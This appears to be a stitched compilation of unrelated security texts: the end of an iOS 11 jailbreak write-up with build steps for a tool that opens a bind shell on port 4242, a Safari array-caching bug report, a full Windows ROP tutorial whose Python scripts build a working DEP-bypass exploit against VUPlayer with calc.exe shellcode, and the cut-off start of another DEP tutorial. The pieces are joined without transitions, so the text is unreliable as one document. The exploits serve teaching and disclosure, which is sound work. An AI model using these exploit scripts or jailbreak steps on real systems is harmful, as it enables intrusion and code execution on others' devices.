The kernel keeps track of which port to send messages to amfid using a host special port called HOST_AMFID_PORT. If we have unsandboxed root code execution, we can set this port to a new value. Apple has protected against this attack by checking whether the reply to a validation request really came from amfid: the cdhash of the sender is compared to amfid’s cdhash. However, this doesn’t actually prevent the message from being sent to a process other than amfid; it only prevents the reply from coming from a non-amfid process. If we set up a triangle where the kernel sends messages to us, we generate the reply and pass it to amfid, and then amfid sends the reply to the kernel, then we’ll be able to bypass the sender check.

There are numerous advantages to this approach, of which the biggest is probably access to additional flags in the verify_code_directory service routine. Even though amfid does not use them all, there are many other output flags that amfid could set to control the behavior of codesigning. Here’s a partial prototype of verify_code_directory:

kern_return_t
verify_code_directory(
		mach_port_t    amfid_port,
		amfid_path_t   path,
		uint64_t       file_offset,
		int32_t        a4,
		int32_t        a5,
		int32_t        a6,
		int32_t *      entitlements_valid,
		int32_t *      signature_valid,
		int32_t *      unrestrict,
		int32_t *      signer_type,
		int32_t *      is_apple,
		int32_t *      is_developer_code,
		amfid_a13_t    a13,
		amfid_cdhash_t cdhash,
		audit_token_t  audit);

Of particular interest for jailbreak developers is the is_apple parameter. This parameter does not appear to be used by amfid, but if set, it will cause the kernel to set the CS_PLATFORM_BINARY codesigning flag, which grants the application platform binary privileges. In particular, this means that the application can now use task ports to modify platform binaries directly.

Loopholes used in this attack

This attack takes advantage of several loopholes that aren’t security vulnerabilities themselves but do minimize the effectiveness of various exploit mitigations. Not all of these need to be closed together, since some are partially redundant, but it’s worth listing them all anyway.

In the kernel:

  1. task_threads can promote an inspect-only task_inspect_t to a modify-capable thread_act_t.
  2. There is no thread_conversion_eval to perform the role of task_conversion_eval for threads.
  3. A non-platform binary may use a task_inspect_t right for a platform binary.
  4. Exception messages for unsandboxed processes may be delivered to sandboxed processes, even though that provides a way to escape the sandbox. It’s not clear whether there is a clean fix for this loophole.
  5. Unsandboxed code execution, the host-priv port, and the ability to crash a task_for_pid-allow process can be combined to build a task_for_pid workaround. (The workaround is: call host_set_exception_ports to set a new host-level exception handler, then crash the task_for_pid-allow process to receive its task port and execute code with the entitlement.)

In app extensions:

  1. App extensions that share an application group can communicate using Mach messages, despite the documentation suggesting that communication between the host app and the app extension should be impossible.

Recommended fixes and mitigations

I recommend the following fixes, roughly in order of importance:

  1. Only deallocate Mach ports in the launchd service routines when returning KERN_SUCCESS. This will fix the Mach port replacement vulnerability.
  2. Close the task_threads loophole allowing a non-platform binary to use the task port of a platform binary to achieve code execution.
  3. Fix crashing issues in ReportCrash.
  4. The set of Mach services reachable from within the container sandbox should be minimized. I do not see a legitimate reason for most iOS apps to communicate with ReportCrash or SafetyNet.
  5. As many processes as possible should be sandboxed. I’m not sure whether druid needs to be unsandboxed to function properly, but if not, it should be placed in an appropriate sandbox.
  6. Dead code should be eliminated. SafetyNet does not seem to be performing its intended functionality. If it is no longer needed, it should probably be removed.
  7. Close the host_set_exception_ports-based task_for_pid workaround. For example, consider whether it’s worth restricting host_set_exception_ports to root or restricting the usability of the host-priv port under some configurations. This violates the elegant capabilities-based design of Mach, but host_set_exception_ports might be a promising target for abuse.
  8. Consider whether it’s worth adding task_conversion_eval to task_inspect_t.

Running blanket

Blanket should work on any device running iOS 11.2.6.

  1. Download the project:
    git clone https://github.com/bazad/blanket
    cd blanket
    
  2. Download and build the threadexec library, which is required for blanket to inject code in processes and tasks:
    git clone https://github.com/bazad/threadexec
    cd threadexec
    make ARCH=arm64 SDK=iphoneos EXTRA_CFLAGS='-mios-version-min=11.1 -fembed-bitcode'
    cd ..
    
  3. Download Jonathan Levin’s iOS binpack, which contains the binaries that will be used by the bind shell. If you change the payload to do something else, you won’t need the binpack.
    mkdir binpack
    curl http://newosxbook.com/tools/binpack64-256.tar.gz | tar -xf- -C binpack
    
  4. Open Xcode and configure the project. You will need to change the signing identifier and specify a custom application group entitlement.
  5. Edit the file headers/config.h and change APP_GROUP to whatever application group identifier you specified earlier.

After that, you should be able to build and run the project on the device.

If blanket is successful, it will run the payload binary (source in blanket_payload/blanket_payload.c), which by default spawns a bind shell on port 4242. You can connect to that port with netcat and run arbitrary shell commands.

Credits

Many thanks to Ian Beer and Jonathan Levin for their excellent iOS security and internals research.

Timeline

Apple assigned the Mach port replacement vulnerability in launchd CVE-2018-4280, and it was patched in iOS 11.4.1 and macOS 10.13.6 on July 9.

Serious bug, Array state will be cached in iOS 12 Safari.

Some problem of Array’s value state in the newly released iOS 12 Safari, for example, code like this:

<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
    <title>iOS 12 Safari bugs</title>
    <script type="text/javascript">
    window.addEventListener("load", function ()
    {
        let arr = [1, 2, 3, 4, 5];
        alert(arr.join());

        document.querySelector("button").addEventListener("click", function ()
        {
            arr.reverse();
        });
    });
    </script>
</head>
<body>
    <button>Array.reverse()</button>
    <p style="color:red;">test: click button and refresh page, code:</p>
</body>
</html>

It’s definitely a BUG! And it’s a very serious bug.

As my test, the bug is due to the optimization of array initializer which all values are primitive literal. For example () => [1, null, 'x'] will return such arrays, and all return arrays link to same memory address, and some method like toString() is also memorized. Normally, any mutable operation on such array will copy to a individual memory space and link to it, this is so-called copy-on-write technique (https://en.wikipedia.org/wiki/Copy-on-write).

reverse() method will mutate the array, so it should trigger CoW, Unfortunately, it doesn’t now, which cause bug.

On the other hand, all methods which do not modify the array should not trigger CoW, and I find that even a.fill(value, 0, 0) or a.copyWithin(index, 0, 0) won’t trigger CoW because such callings don’t really mutate the array. But I notice that a.slice() WILL trigger CoW. So I guess the real reason of this bug may be someone accidentally swap the index of slice and reverse.

Add a demo page, try it use iOS 12 Safari: https://cdn.miss.cat/demo/ios12-safari-bug.html

thanks

Zero Day Zen Garden: Windows Exploit Development — Part 5 [Return Oriented Programming Chains]

( orig text )

Hello again! Welcome to another post on Windows exploit development. Today we’re going to be discussing a technique called Return Oriented Programming (ROP) that’s commonly used to get around a type of exploit mitigation called Data Execution Prevention (DEP). This technique is slightly more advanced than previous exploitation methods, but it’s well worth learning because DEP is a protective mechanism that is now employed on a majority of modern operating systems. So without further ado, it’s time to up your exploit development game and learn how to commit a roppery!

Setting up a Windows 7 Development Environment

So far we’ve been doing our exploitation on Windows XP as a way to learn how to create exploits in an OS that has fewer security mechanisms to contend with. It’s important to start simple when you’re learning something new! But, it’s now time to take off the training wheels and move on to a more modern OS with additional exploit mitigations. For this tutorial, we’ll be using a Windows 7 virtual machine environment. Thankfully, Microsoft provides Windows 7 VMs for demoing their Internet Explorer browser. They will work nicely for our purposes here today so go ahead and download the VM from here.

Next, load it into VirtualBox and start it up. Install Immunity Debugger, Python and mona.py again as instructed in the previous blog post here. When that’s ready, you’re all set to start learning ROP with our target software VUPlayer which you can get from the Exploit-DB entry we’re working off here.

Finally, make sure DEP is turned on for your Windows 7 virtual machine by going to Control Panel > System and Security > System then clicking on Advanced system settings, click on Settings… and go to the Data Execution Prevention tab to select ‘Turn on DEP for all programs and services except those I select:’ and restart your VM to ensure DEP is turned on.

post_image

With that, you should be good to follow along with the rest of the tutorial.

Data Execution Prevention and You!

Let’s start things off by confirming that a vulnerability exists and write a script to cause a buffer overflow:

vuplayer_rop_poc1.py

buf = "A"*3000
 
print "[+] Creating .m3u file of size "+ str(len(buf))
 
file = open('vuplayer-dep.m3u','w');
file.write(buf);
file.close();
 
print "[+] Done creating the file"

Attach Immunity Debugger to VUPlayer and run the script, drag and drop the output file ‘vuplayer-dep.m3u’ into the VUPlayer dialog and you’ll notice that our A character string overflows a buffer to overwrite EIP.

post_image

Great! Next, let’s find the offset by writing a script with a pattern buffer string. Generate the buffer with the following mona command:

!mona pc 3000

Then copy paste it into an updated script:

vuplayer_rop_poc2.py

buf = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9"
 
print "[+] Creating .m3u file of size "+ str(len(buf))
 
file = open('vuplayer-dep.m3u','w');
file.write(buf);
file.close();
 
print "[+] Done creating the file"

Restart VUPlayer in Immunity and run the script, drag and drop the file then run the following mona command to find the offset:

!mona po 0x68423768

post_image

post_image

Got it! The offset is at 1012 bytes into our buffer and we can now update our script to add in an address of our choosing. Let’s find a jmp esp instruction we can use with the following mona command:

!mona jmp -r esp

Ah, I see a good candidate at address 0x1010539f in the output files from Mona:

post_image

Let’s plug that in and insert a mock shellcode payload of INT instructions:

vuplayer_rop_poc3.py

import struct
 
BUF_SIZE = 3000
 
junk = "A"*1012
eip = struct.pack('<L', 0x1010539f)
 
shellcode = "\xCC"*200
 
exploit = junk + eip + shellcode
 
fill = "\x43" * (BUF_SIZE - len(exploit))
 
buf = exploit + fill
 
print "[+] Creating .m3u file of size "+ str(len(buf))
 
file = open('vuplayer-dep.m3u','w');
file.write(buf);
file.close();

print "[+] Done creating the file"

Time to restart VUPlayer in Immunity again and run the script. Drag and drop the file and…

post_image

Nothing happened? Huh? How come our shellcode payload didn’t execute? Well, that’s where Data Execution Prevention is foiling our evil plans! The OS is not allowing us to interpret the “0xCC” INT instructions as planned, instead it’s just failing to execute the data we provided it. This causes the program to simply crash instead of run the shellcode we want. But, there is a glimmer of hope! See, we were able to execute the “JMP ESP” instruction just fine right? So, there is SOME data we can execute, it must be existing data instead of arbitrary data like have used in the past. This is where we get creative and build a program using a chain of assembly instructions just like the “JMP ESP” we were able to run before that exist in code sections that are allowed to be executed. Time to learn about ROP!

Problems, Problems, Problems

Let’s start off by thinking about what the core of our problem here is. DEP is preventing the OS from interpreting our shellcode data “\xCC” as an INT instruction, instead it’s throwing up its hands and saying “I have no idea what in fresh hell this 0xCC stuff is! I’m just going to fail…” whereas without DEP it would say “Ah! Look at this, I interpret 0xCC to be an INT instruction, I’ll just go ahead and execute this instruction for you!”. With DEP enabled, certain sections of memory (like the stack where our INT shellcode resides) are marked as NON-EXECUTABLE (NX), meaning data there cannot be interpreted by the OS as an instruction. But, nothing about DEP says we can’t execute existing program instructions that are marked as executable like for example, the code making up the VUPlayer program! This is demonstrated by the fact that we could execute the JMP ESP code, because that instruction was found in the program itself and was therefore marked as executable so the program can run. However, the 0xCC shellcode we stuffed in is new, we placed it there in a place that was marked as non-executable.

ROP to the Rescue

So, we now arrive at the core of the Return Oriented Programming technique. What if, we could collect a bunch of existing program assembly instructions that aren’t marked as non-executable by DEP and chain them together to tell the OS to make our shellcode area executable? If we did that, then there would be no problem right? DEP would still be enabled but, if the area hosting our shellcode has been given a pass by being marked as executable, then it won’t have a problem interpreting our 0xCC data as INT instructions.

ROP does exactly that, those nuggets of existing assembly instructions are known as “gadgets” and those gadgets typically have the form of a bunch of addresses that point to useful assembly instructions followed by a “return” or “RET” instruction to start executing the next gadget in the chain. That’s why it’s called Return Oriented Programming!

But, what assembly program can we build with our gadgets so we can mark our shellcode area as executable? Well, there’s a variety to choose from on Windows but the one we will be using today is called VirtualProtect(). If you’d like to read about the VirtualProtect() function, I encourage you to check out the Microsoft developer page about it here). But, basically it will mark a memory page of our choosing as executable. Our challenge now, is to build that function in assembly using ROP gadgets found in the VUPlayer program.

Building a ROP Chain

So first, let’s establish what we need to put into what registers to get VirtualProtect() to complete successfully. We need to have:

  1. lpAddress: A pointer to an address that describes the starting page of the region of pages whose access protection attributes are to be changed.
  2. dwSize: The size of the region whose access protection attributes are to be changed, in bytes.
  3. flNewProtect: The memory protection option. This parameter can be one of the memory protection constants.
  4. lpflOldProtect: A pointer to a variable that receives the previous access protection value of the first page in the specified region of pages. If this parameter is NULL or does not point to a valid variable, the function fails.

Okay! Our tasks are laid out before us, time to create a program that will fulfill all these requirements. We will set lpAddress to the address of our shellcode, dwSize to be 0x201 so we have a sizable chunk of memory to play with, flNewProtect to be 0x40 which will mark the new page as executable through a memory protection constant (complete list can be found here), and finally we’ll set lpflOldProtect to be any static writable location. Then, all that is left to do is call the VirtualProtect() function we just set up and watch the magic happen!

First, let’s find ROP gadgets to build up the arguments our VirtualProtect() function needs. This will become our toolbox for building a ROP chain, we can grab gadgets from executable modules belonging to VUPlayer by checking out the list here:

post_image

To generate a list of usable gadgets from our chosen modules, you can use the following command in Mona:

!mona rop -m “bass,basswma,bassmidi”

post_image

Check out the rop_suggestions.txt file Mona generated and let’s get to building our ROP chain.

post_image

First let’s place a value into EBP for a call to PUSHAD at the end:

0x10010157,  # POP EBP # RETN [BASS.dll]
0x10010157,  # skip 4 bytes [BASS.dll]

Here, put the dwSize 0x201 by performing a negate instruction and place the value into EAX then move the result into EBX with the following instructions:

0x10015f77,  # POP EAX # RETN [BASS.dll] 
0xfffffdff,  # Value to negate, will become 0x00000201
0x10014db4,  # NEG EAX # RETN [BASS.dll] 
0x10032f72,  # XCHG EAX,EBX # RETN 0x00 [BASS.dll]

Then, we’ll put the flNewProtect 0x40 into EAX then move the result into EDX with the following instructions:

0x10015f82,  # POP EAX # RETN [BASS.dll] 
0xffffffc0,  # Value to negate, will become 0x00000040
0x10014db4,  # NEG EAX # RETN [BASS.dll] 
0x10038a6d,  # XCHG EAX,EDX # RETN [BASS.dll]

Next, let’s place our writable location (any valid writable location will do) into ECX for lpflOldProtect.

0x101049ec,  # POP ECX # RETN [BASSWMA.dll] 
0x101082db,  # &Writable location [BASSWMA.dll]

Then, we get some values into the EDI and ESI registers for a PUSHAD call later:

0x1001621c,  # POP EDI # RETN [BASS.dll] 
0x1001dc05,  # RETN (ROP NOP) [BASS.dll]
0x10604154,  # POP ESI # RETN [BASSMIDI.dll] 
0x10101c02,  # JMP [EAX] [BASSWMA.dll]

Finally, we set up the call to the VirtualProtect() function by placing the address of VirtualProtect (0x1060e25c) in EAX:

0x10015fe7,  # POP EAX # RETN [BASS.dll] 
0x1060e25c,  # ptr to &VirtualProtect() [IAT BASSMIDI.dll]

Then, all that’s left to do is push the registers with our VirtualProtect() argument values to the stack with a handy PUSHAD then pivot to the stack with a JMP ESP:

0x1001d7a5,  # PUSHAD # RETN [BASS.dll] 
0x10022aa7,  # ptr to 'jmp esp' [BASS.dll]

PUSHAD will place the register values on the stack in the following order: EAX, ECX, EDX, EBX, original ESP, EBP, ESI, and EDI. If you’ll recall, this means that the stack will look something like this with the ROP gadgets we used to setup the appropriate registers:

| EDI (0x1001dc05) |
| ESI (0x10101c02) |
| EBP (0x10010157) |
================
VirtualProtect() Function Call args on stack
| ESP (0x0012ecf0) | ← lpAddress [JMP ESP + NOPS + shellcode]
| 0x201 | ← dwSize
| 0x40 | ← flNewProtect
| &WritableLocation (0x101082db) | ← lpflOldProtect
| &VirtualProtect (0x1060e25c) | ← VirtualProtect() call
================

Now our stack will be setup to correctly call the VirtualProtect() function! The top param hosts our shellcode location which we want to make executable, we are giving it the ESP register value pointing to the stack where our shellcode resides. After that it’s the dwSize of 0x201 bytes. Then, we have the memory protection value of 0x40 for flNewProtect. Then, it’s the valid writable location of 0x101082db for lpflOldProtect. Finally, we have the address for our VirtualProtect() function call at 0x1060e25c.

With the JMP ESP instruction, EIP will point to the VirtualProtect() call and we will have succeeded in making our shellcode payload executable. Then, it will slide down a NOP sled into our shellcode which will now work beautifully!

Updating Exploit Script with ROP Chain

It’s time now to update our Python exploit script with the ROP chain we just discussed, you can see the script here:

vuplayer_rop_poc4.py


import struct
 
BUF_SIZE = 3000
 
def create_rop_chain():

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
      0x10010157,  # POP EBP # RETN [BASS.dll]
      0x10010157,  # skip 4 bytes [BASS.dll]
      0x10015f77,  # POP EAX # RETN [BASS.dll]
      0xfffffdff,  # Value to negate, will become 0x00000201
      0x10014db4,  # NEG EAX # RETN [BASS.dll]
      0x10032f72,  # XCHG EAX,EBX # RETN 0x00 [BASS.dll]
      0x10015f82,  # POP EAX # RETN [BASS.dll]
      0xffffffc0,  # Value to negate, will become 0x00000040
      0x10014db4,  # NEG EAX # RETN [BASS.dll]
      0x10038a6d,  # XCHG EAX,EDX # RETN [BASS.dll]
      0x101049ec,  # POP ECX # RETN [BASSWMA.dll]
      0x101082db,  # &Writable location [BASSWMA.dll]
      0x1001621c,  # POP EDI # RETN [BASS.dll]
      0x1001dc05,  # RETN (ROP NOP) [BASS.dll]
      0x10604154,  # POP ESI # RETN [BASSMIDI.dll]
      0x10101c02,  # JMP [EAX] [BASSWMA.dll]
      0x10015fe7,  # POP EAX # RETN [BASS.dll]
      0x1060e25c,  # ptr to &VirtualProtect() [IAT BASSMIDI.dll]
      0x1001d7a5,  # PUSHAD # RETN [BASS.dll]
      0x10022aa7,  # ptr to 'jmp esp' [BASS.dll]
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
 
junk = "A"*1012
 
rop_chain = create_rop_chain()
 
eip = struct.pack('<L',0x10601033) # RETN (BASSMIDI.dll)
 
nops = "\x90"*16
 
shellcode = "\xCC"*200
 
exploit = junk + eip + rop_chain + nops + shellcode
 
fill = "\x43" * (BUF_SIZE - len(exploit))
 
buf = exploit + fill
 
print "[+] Creating .m3u file of size "+ str(len(buf))
 
file = open('vuplayer-dep.m3u','w');
file.write(buf);
file.close();
 
print "[+] Done creating the file"

We added the ROP chain in a function called create_rop_chain() and we have our mock shellcode to verify if the ROP chain did its job. Go ahead and run the script then restart VUPlayer in Immunity Debug. Drag and drop the file to see a glorious INT3 instruction get executed!

post_image

You can also inspect the process memory to see the ROP chain layout:

post_image

Now, sub in an actual payload, I’ll be using a vanilla calc.exe payload. You can view the updated script below:

vuplayer_rop_poc5.py

import struct
 
BUF_SIZE = 3000
 
def create_rop_chain():
 
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
      0x10010157,  # POP EBP # RETN [BASS.dll]
      0x10010157,  # skip 4 bytes [BASS.dll]
      0x10015f77,  # POP EAX # RETN [BASS.dll]
      0xfffffdff,  # Value to negate, will become 0x00000201
      0x10014db4,  # NEG EAX # RETN [BASS.dll]
      0x10032f72,  # XCHG EAX,EBX # RETN 0x00 [BASS.dll]
      0x10015f82,  # POP EAX # RETN [BASS.dll]
      0xffffffc0,  # Value to negate, will become 0x00000040
      0x10014db4,  # NEG EAX # RETN [BASS.dll]
      0x10038a6d,  # XCHG EAX,EDX # RETN [BASS.dll]
      0x101049ec,  # POP ECX # RETN [BASSWMA.dll]
      0x101082db,  # &Writable location [BASSWMA.dll]
      0x1001621c,  # POP EDI # RETN [BASS.dll]
      0x1001dc05,  # RETN (ROP NOP) [BASS.dll]
      0x10604154,  # POP ESI # RETN [BASSMIDI.dll]
      0x10101c02,  # JMP [EAX] [BASSWMA.dll]
      0x10015fe7,  # POP EAX # RETN [BASS.dll]
      0x1060e25c,  # ptr to &VirtualProtect() [IAT BASSMIDI.dll]
      0x1001d7a5,  # PUSHAD # RETN [BASS.dll]
      0x10022aa7,  # ptr to 'jmp esp' [BASS.dll]
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
 
junk = "A"*1012
 
rop_chain = create_rop_chain()
 
eip = struct.pack('<L',0x10601033) # RETN (BASSMIDI.dll)
 
nops = "\x90"*16
 
shellcode = ("\xbb\xc7\x16\xe0\xde\xda\xcc\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
"\x33\x83\xc0\x04\x31\x58\x0e\x03\x9f\x18\x02\x2b\xe3\xcd\x4b"
"\xd4\x1b\x0e\x2c\x5c\xfe\x3f\x7e\x3a\x8b\x12\x4e\x48\xd9\x9e"
"\x25\x1c\xc9\x15\x4b\x89\xfe\x9e\xe6\xef\x31\x1e\xc7\x2f\x9d"
"\xdc\x49\xcc\xdf\x30\xaa\xed\x10\x45\xab\x2a\x4c\xa6\xf9\xe3"
"\x1b\x15\xee\x80\x59\xa6\x0f\x47\xd6\x96\x77\xe2\x28\x62\xc2"
"\xed\x78\xdb\x59\xa5\x60\x57\x05\x16\x91\xb4\x55\x6a\xd8\xb1"
"\xae\x18\xdb\x13\xff\xe1\xea\x5b\xac\xdf\xc3\x51\xac\x18\xe3"
"\x89\xdb\x52\x10\x37\xdc\xa0\x6b\xe3\x69\x35\xcb\x60\xc9\x9d"
"\xea\xa5\x8c\x56\xe0\x02\xda\x31\xe4\x95\x0f\x4a\x10\x1d\xae"
"\x9d\x91\x65\x95\x39\xfa\x3e\xb4\x18\xa6\x91\xc9\x7b\x0e\x4d"
"\x6c\xf7\xbc\x9a\x16\x5a\xaa\x5d\x9a\xe0\x93\x5e\xa4\xea\xb3"
"\x36\x95\x61\x5c\x40\x2a\xa0\x19\xbe\x60\xe9\x0b\x57\x2d\x7b"
"\x0e\x3a\xce\x51\x4c\x43\x4d\x50\x2c\xb0\x4d\x11\x29\xfc\xc9"
"\xc9\x43\x6d\xbc\xed\xf0\x8e\x95\x8d\x97\x1c\x75\x7c\x32\xa5"
"\x1c\x80")
 
exploit = junk + eip + rop_chain + nops + shellcode
 
fill = "\x43" * (BUF_SIZE - len(exploit))
 
buf = exploit + fill
 
print "[+] Creating .m3u file of size "+ str(len(buf))
 
file = open('vuplayer-dep.m3u','w');
file.write(buf);
file.close();
 
print "[+] Done creating the file"

Run the final exploit script to generate the m3u file, restart VUPlayer in Immunity Debug and voila! We have a calc.exe!

post_image

Also, if you are lucky then Mona will auto-generate a complete ROP chain for you in the rop_chains.txt file from the !mona rop command (which is what I used). But, it’s important to understand how these chains are built line by line before you go automating everything!

post_image

Resources, Final Thoughts and Feedback

Congrats on building your first ROP chain! It’s pretty tricky to get your head around at first, but all it takes is a little time to digest, some solid assembly programming knowledge and a bit of familiarity with the Windows OS. When you get the essentials under your belt, these more advanced exploit techniques become easier to handle. If you found anything to be unclear or you have some recommendations then send me a message on Twitter (@shogun_lab). I also encourage you to take a look at some additional tutorials on ROP and the developer docs for the various Windows OS memory protection functions. See you next time in Part 6!

Bypass Data Execution Protection (DEP)

Hey folks! this topic details how to overflow a buffer, bypass DEP (Data Execution Prevention) and take control of the executable

Recommended Prerequisites

  • C/C++ language, a basic level would be fine
  • x86 Intel Assembly
  • Familiarity with Buffer Overflow
  • Debuggers/Disassembly

The binary

File 40
Virustotal 22

Okay, first thing we need to do is see what the executable brings us, so we run it.

r_opt

Here we see that it is asking for a file file.dat but as it does not exist it tells us that it cannot be opened, Once created we see that it shows us a message with 3 values at 0 that seem to correspond to 3 variables (cookie, cookie2 and size) and nothing else.

Since we don’t know what it does, let’s take a look at it.

